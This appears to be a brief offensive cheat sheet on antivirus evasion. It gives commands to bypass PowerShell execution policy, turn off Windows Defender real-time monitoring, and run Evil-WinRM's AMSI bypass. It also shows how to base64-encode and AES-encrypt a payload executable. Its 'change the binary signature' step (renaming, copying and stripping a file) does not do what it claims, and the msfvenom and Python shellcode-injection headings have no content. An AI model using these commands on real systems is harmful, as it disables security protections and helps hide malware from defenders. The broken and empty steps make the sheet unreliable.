AV Evasion

PowerShell

powershell -ep bypass
Set-MpPreference -DisableRealtimeMonitoring $true

Evil-WinRM

# winrm
menu
Bypass-4MSI

Generate a Base64-encoded payload

base64 payload.exe > payload.b64

Encrypt a binary

openssl enc -aes-256-cbc -salt -in payload.exe -out payload_enc.exe -k secret

Change the binary signature

mv payload.exe payload.bak && cp payload.bak payload.exe
strip --strip-debug payload.exe

Obfuscation with msfvenom

Shellcode injection with Python
